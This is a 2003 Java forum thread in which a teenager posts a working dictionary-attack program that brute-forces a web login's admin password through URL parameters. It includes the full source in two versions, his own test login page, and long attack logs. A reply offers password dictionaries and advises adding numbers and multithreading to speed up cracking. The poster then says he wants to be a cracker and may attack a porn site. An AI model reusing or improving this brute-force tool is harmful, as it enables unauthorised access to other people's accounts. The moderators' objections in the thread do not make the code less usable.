young HACKER's training: pass gen :)))

Hi!!!
Please don't laugh at me... I am only 16 years old and I was sitting and thinking about which porn web site should I watch when an accident happened and THE THOUGHT was born inside my head... here's a result:
/* * Created on Jul 24, 2003 * */ package ivj.hack; import java.util.*; import java.net.MalformedURLException; import java.net.URL; import java.io.*; /** * Attempts to come up with a pass from a given dictionary. * Could be executed by multiple threads. * @author Ivan Jouikov (ivj@comcast.net) */ public class PassGen implements Runnable { String user_name = "admin"; String url_name = "http://localhost:8080/"; URL url; String dictionary = "/home/ivan/dic.txt"; int count = 0; /** * */ public PassGen() { try { url = new URL(url_name); } catch (MalformedURLException e) { // TODO Auto-generated catch block e.printStackTrace(); System.exit(1); } } public static void main(String[] args) { new PassGen().run(); } public String[] solvePass(String pass) { // Check to see how many ,'s separated parts there are String [] split = pass.split(","); if ( split.length <= 1 ) return split; String [] result = new String[split.length]; //in progress return null; } public void run() { BufferedReader dicReader = null; // Load dictionary stream try { dicReader = new BufferedReader(new FileReader(dictionary)); } catch (FileNotFoundException e) { e.printStackTrace(); System.out.println("ERROR: Dictionary \"" + dictionary + "\" does not exist!"); System.exit(1); } String pass; // Try every password from a dictionary file try { for(; :wink: { // get pass pass = dicReader.readLine(); if (pass == null) break; count++; // post to web url = new URL(url_name + "?name=admin&pass=" + pass); System.out.println("################################"); System.out.println("Request: " + url.toString()); // read from web BufferedReader resp = new BufferedReader(new InputStreamReader(url.openStream())); String full = ""; String temp = null; while((temp=resp.readLine()) != null) full += temp; full = full.trim(); System.out.println("response: " + full); // check the result if (!full.equals("false")) { System.out.println("SUCCESS! PASSWORD HAS BEEN FOUND: \"" + pass + "\""); System.out.println("Total attempts: " + count); System.exit(0); } // In case of failure System.out.println("Failed!\n\n"); } System.out.println("SORRY! This dictionary doesn't contain the password"); System.out.println("Total attempts: " + count); } catch(Exception e) { e.printStackTrace(); System.exit(1); } } }

In a nutshell, this is a program that reads words from a dictionary and plugs them into parameters of the given URL...
Now The question is... how would you check for the result of that "hacking"? I mean whether you succeeded with your pass or not? Since its my own web, I simply print out either "true" or "false" and check that.... But in a real life situation, what would YOU do?
I'd guess try some random pass, capture the output of failed login, and then compare it in the program?
Thankx in advance,
Ivan

Here's the proof :
index.jsp:
<%@ page language="java" %> <% String name = request.getParameter("name"); String pass = request.getParameter("pass"); boolean valid = false; if ( "admin".equals(name) && "cool".equals(pass) ) valid = true; out.println(valid); %>

One more question... the dictionary I am using is in the following format:
IVP IVY, \IES, 'S IVAN, 'S IVORY, \IES IVERSON, 'S IX IZAAK, 'S IZVESTIA, 'S I'M I'D I'LL I'S I'VE JAB, S, "ED, "ING JACK, S, ED, ING, 'S JACS, 'S JADE, S, D, \ING JAG, S, "ED, "ING
I understand most of the ,' args:
\ = cut off the last char of the original word
" = double the last char of the original word
nothing = just append it
but I don't know what does ' mean.... anybody thinks differently enough?

is there any special trying for that, i need details.
c..u...
regards

trying for what???
Btw, here's an updated version which works with the dictionary (except 's) + lowercases them:
/* * Created on Jul 24, 2003 * */ package ivj.hack; import java.util.*; import java.net.MalformedURLException; import java.net.URL; import java.io.*; /** * Attempts to come up with a pass from a given dictionary. * Could be executed by multiple threads. * @author Ivan Jouikov (ivj@comcast.net) */ public class PassGen implements Runnable { String user_name = "admin"; String url_name = "http://localhost:8080/"; URL url; String dictionary = "/home/ivan/dic2.txt"; int count = 0; long timeStart = 0; /** * */ public PassGen() { try { url = new URL(url_name); } catch (MalformedURLException e) { // TODO Auto-generated catch block e.printStackTrace(); System.exit(1); } } public static void main(String[] args) { new PassGen().run(); } public static String[] solvePass(String pass) { // Check to see how many ,'s separated parts there are String [] split = pass.split(","); if ( split.length < 1 ) return split; String [] result = new String[split.length*2]; // *2 for the lower case // format: ORIGINALWORD , arg, arg , arg result[0] = split[0]; // apply arguments for(int i = 1; i < split.length; i++) result[i] = translateArg(result[0], split[i]); // same arguments only in the lower case - to the last part of the array for ( int source = 0, dest = split.length; dest < result.length; source++,dest++ ) result[dest] = result[source].toLowerCase(); return result; } public static String translateArg(String word, String arg) { word = word.trim(); arg = arg.trim(); if (arg.startsWith("\\")) return word.substring(0, word.length()-1) + arg.substring(1,arg.length()); else if (arg.startsWith("\"")) return word + word.charAt(word.length()-1) + arg.substring(1,arg.length()); else return word + arg; } public void run() { timeStart = System.currentTimeMillis(); BufferedReader dicReader = null; // Load dictionary stream try { dicReader = new BufferedReader(new FileReader(dictionary)); } catch (FileNotFoundException e) { e.printStackTrace(); System.out.println("ERROR: Dictionary \"" + dictionary + "\" does not exist!"); System.exit(1); } String pass; // Try every password from a dictionary file with modifications try { for(; :wink: { // get pass pass = dicReader.readLine(); if (pass == null) break; String [] passes = solvePass(pass); for ( int i = 0; i < passes.length; i++ ) { count++; url = new URL(url_name + "?name=admin&pass=" + passes[i]); System.out.println("##########################################"); System.out.println("Attempting: " + url); // post to web and get result boolean failed = requestFailed(url); // check the result if (!failed) { System.out.println("SUCCESS! PASSWORD HAS BEEN FOUND: \"" + passes[i] + "\""); System.out.println("Total attempts: " + count); System.out.println("Seconds taken: " + (System.currentTimeMillis()-timeStart)/100); System.exit(0); } // In case of failure System.out.println("Failed!"); } } System.out.println("SORRY! This dictionary doesn't contain the password"); System.out.println("Total attempts: " + count); System.out.println("Seconds taken: " + (System.currentTimeMillis()-timeStart)/100); } catch(Exception e) { e.printStackTrace(); System.exit(1); } } public boolean requestFailed(URL url) throws IOException { // read from web BufferedReader resp = new BufferedReader(new InputStreamReader(url.openStream())); String full = ""; String temp = null; while((temp=resp.readLine()) != null) full += temp; full = full.trim(); System.out.println("response: " + full); // check the result return (full.equals("false")); } }

An example of output:
########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INCOMPUTABLE" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INCOMPUTABLE</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INCOMPUTABLY" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INCOMPUTABLY</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=incomputable" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=incomputable</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=incomputably" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=incomputably</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INCONCLUSIVE" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INCONCLUSIVE</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INCONCLUSIVELY" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INCONCLUSIVELY</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=inconclusive" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=inconclusive</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=inconclusively" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=inconclusively</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INCONSOLABLE" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INCONSOLABLE</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INCONSOLABLY" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INCONSOLABLY</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=inconsolable" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=inconsolable</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=inconsolably" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=inconsolably</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INCONSONANCE" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INCONSONANCE</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INCONSONANCES" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INCONSONANCES</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=inconsonance" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=inconsonance</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=inconsonances" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=inconsonances</a> response: false Failed! ... skipped .... ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=indoctrinate" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=indoctrinate</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=indoctrinates" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=indoctrinates</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=indoctrinated" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=indoctrinated</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=indoctrinating" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=indoctrinating</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=indoctrination" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=indoctrination</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INDOLEACETIC" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INDOLEACETIC</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=indoleacetic" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=indoleacetic</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INDUCIBILITY" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INDUCIBILITY</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INDUCIBILITIES" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INDUCIBILITIES</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=inducibility" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=inducibility</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=inducibilities" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=inducibilities</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INSUFFICIENT" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INSUFFICIENT</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INSUFFICIENTLY" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INSUFFICIENTLY</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=insufficient" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=insufficient</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=insufficiently" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=insufficiently</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INSURRECTION" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INSURRECTION</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INSURRECTIONS" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INSURRECTIONS</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=insurrection" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=insurrection</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=insurrections" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=insurrections</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTELLECTUAL" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTELLECTUAL</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTELLECTUALS" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTELLECTUALS</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTELLECTUALLY" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTELLECTUALLY</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=intellectual" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=intellectual</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=intellectuals" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=intellectuals</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=intellectually" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=intellectually</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTELLIGENCE" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTELLIGENCE</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTELLIGENCES" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTELLIGENCES</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=intelligence" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=intelligence</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=intelligences" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=intelligences</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTELLIGIBLE" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTELLIGIBLE</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTELLIGIBLY" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTELLIGIBLY</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=intelligible" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=intelligible</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=intelligibly" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=intelligibly</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTEMPERANCE" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTEMPERANCE</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTEMPERANCES" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTEMPERANCES</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=intemperance" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=intemperance</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=intemperances" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=intemperances</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTERCEPTION" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTERCEPTION</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=INTERCEPTIONS" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=INTERCEPTIONS</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=interception" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=interception</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=interceptions" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=interceptions</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=CO" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=CO</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=CL" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=CL</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=COL" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=COL</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=COOL" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=COOL</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=co" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=co</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=cl" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=cl</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=col" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=col</a> response: false Failed! ########################################## Attempting: <a href="http://localhost:8080/?name=admin&pass=cool" target="_blank" rel="nofollow">http://localhost:8080/?name=admin&pass=cool</a> response: true SUCCESS! PASSWORD HAS BEEN FOUND: "cool" Total attempts: 246 Seconds taken: 26

I cut out a lot of it... it was run on the following dictionary:
INCOMPUTABLE, \Y INCONCLUSIVE, LY INCONSOLABLE, \Y INCONSONANCE, S INCONTINENCE, S INCONVENIENT, LY INCORRIGIBLE, \Y INCURABILITY, \IES INDEBTEDNESS, ES INDEFENSIBLE, \Y INDELIBILITY, \IES INDEXABILITY, \IES INDEXIBILITY, \IES INDIFFERENCE, S INDIGESTIBLE, \Y INDIRECTNESS, ES INDISPUTABLE, \Y INDOCTRINATE, S, D, \ING, \ION INDOLEACETIC INDUCIBILITY, \IES INEFFABILITY, \IES INEFFICIENCY, \IES INELASTICITY, \IES INEXACTITUDE, S INEXPEDIENCE, S INEXPEDIENCY, \IES INEXPERIENCE, S, D INEXPLICABLE, \Y INEXTENSIBLE, \Y INEXTRICABLE, \Y INFELICITOUS, LY INFERABILITY, \IES INFLAMMATION, S INFLAMMATORY INFLECTIONAL, LY INFRINGEMENT, S INFUSIBILITY, \IES INGRATIATING, LY INHABITATION, S INHARMONIOUS, LY INHOSPITABLE, \Y INHUMANENESS, ES INJURABILITY, \IES INSECURENESS, ES INSOLUBILITY, \IES INSPECTORATE, S INSTALLATION, S INSTILLATION, S INSTRUMENTAL, S, LY INSUFFERABLE, \Y INSUFFICIENT, LY INSURRECTION, S INTELLECTUAL, S, LY INTELLIGENCE, S INTELLIGIBLE, \Y INTEMPERANCE, S INTERCEPTION, S CO, \L, L, "L INTERCOMPARE, S, D, \ING INTERCONNECT, S, ED, ING INTERFERENCE, S INTERGLACIAL, LY INTERJECTION, S INTERLIBRARY INTERLINGUAL, LY INTERLOBULAR, LY INTERLOCUTOR, S INTERMARRIED INTERMEDIARY, \IES INTERMEDIATE, S, LY INTERMINABLE, \Y INTERMISSION, S INTERMITTENT, LY INTERNETWORK, S, ED, ING INTEROSSEOUS INTERPRETIVE, LY INTERPROCESS, ES INTERROGATOR, S INTERSCIENCE, S INTERSECTION, S INTERSPECIES INTERSTELLAR, LY INTERSTITIAL, LY INTERVENTION, S INTERVOCALIC, ALLY INTESTINALIS INTIMIDATING, LY INTRACOUNTRY INTRACRANIAL, LY INTRAHEPATIC, ALLY INTRANSIGENT, S INTRANSITIVE, LY INTRANUCLEAR, LY INTREPIDNESS, ES INTRODUCTION, S, 'S INTRODUCTORY INTROJECTION, S INVERTEBRATE, S
So.. anybody has any suggestions regarding my question in the first post (and the one about 's) ??

Btw, the web where I got the dictionary is:
http://pdp-10.trailing-edge.com/bb-l014w-bm_tops20_v7_0_atpch_23/01/autopatch/password.dictionary
If you don't want to wast time printing to the console, do the following to your main:
public static void main(String[] args) throws IOException { // set up for loggining rather than screwing the console. String out = "/home/ivan/LOG.txt"; File f = new File(out); if (!f.exists()) f.createNewFile(); System.setOut(new PrintStream(new FileOutputStream(f))); // run new PassGen().run(); }
+ do some uncommenting... and here's my result with the REAL dictionary:
Attempts: 1000
Attempts: 2000
Attempts: 3000
Attempts: 4000
Attempts: 5000
Attempts: 6000
Attempts: 7000
Attempts: 8000
Attempts: 9000
Attempts: 10000
Attempts: 11000
Attempts: 12000
Attempts: 13000
Attempts: 14000
Attempts: 15000
Attempts: 16000
Attempts: 17000
Attempts: 18000
Attempts: 19000
Attempts: 20000
Attempts: 21000
Attempts: 22000
Attempts: 23000
Attempts: 24000
Attempts: 25000
Attempts: 26000
Attempts: 27000
Attempts: 28000
Attempts: 29000
SUCCESS! PASSWORD HAS BEEN FOUND: "cool"
Total attempts: 29644
Seconds taken: 1347

(the seconds are inaccuarte - divide by extra 10 )
Well, I am off to bed

I don't see any Servlet here -- is this thread in the wrong folder?

First of all JavaRanch does not approve or support any Hacker activity. :roll:
Second, this is not a servlet so I am moving this topic to Java In General - Intermediate.

This isnt hacker activity... and it does belong to Servlets (or web at least) since my question is how do you handle that input....

any answers?

Originally posted by Ivan Jouikov:
This isnt hacker activity... and it does belong to Servlets (or web at least) since my question is how do you handle that input....

any answers?

Cindy is right this is a Java in General topic. If you have a specific question regarding the use of Servlets or JSP then post a new topic there. If you want some more dictionaries try Cult of the Dead Cow or better yet buy a copy of Hacking Exposed. If you want, I can send you some pretty voluminous dictionaries. If you want to take this to another level, you will need to modify your code to append simple numbers and make it multi-threaded to split the dictionary up to try multiple entries at once.

thx... can you send the dics to ivj@comcast.net please?
And yes, I want to take it to the next level, and I will.

First of all JavaRanch does not approve or support any Hacker activity.
Of course we do. Hacking == good. Cracking == evil. Usually. This thread is about cracking, not hacking.
[ July 25, 2003: Message edited by: Jim Yingst ]

Originally posted by Jim Yingst:
First of all JavaRanch does not approve or support any Hacker activity.
Of course we do. Hacking == good. Cracking == evil. Usually. This thread is about cracking, not hacking.
[ July 25, 2003: Message edited by: Jim Yingst ]

Cracking is only evil in certain cotexts. If you are doing a security audit on your users for password strength that's OK. Trying to break into corporate networks ain't. But it's unlikely that our neophyte hacker is going to get very far with a brute force dictionary attack there anyway. His IP will be flagged and restricted after the 10th or so failure.

I is youngosrz 1337 haxorz

Cracking is only evil in certain cotexts.
True, true. I did say "usually".
I is youngosrz 1337 haxorz
See, now we know he's evil.

What a funny bloke!
Given that we know that he got this idea by thinking about how he could rip off a porn site, should we really help?
I'm all for helping in the search for knowledge, but in this instance, there is a reasonable chance that our hacker is actually a cracker. Don't you think?
Come on Ivan. If you own up now you won't get in trouble. Did you want to see the kinky ladies. Its ok, we're not angry at you, but you really shouldnt steal....

Keep it real (or something)
Simon

Hey Simon let's just try to guide him and keep the FBI off his case. Who knows he may become the next security guru for M$. God knows they could use one!

Hmm... now you're giving me ideas... I actually didn't think about ripping off a porn site but now I am... my official porn provider is stileproject.com...
But about cracking... yes I DO want to be a cracker... and a hacker ))
But it all starts with knowledge dont it?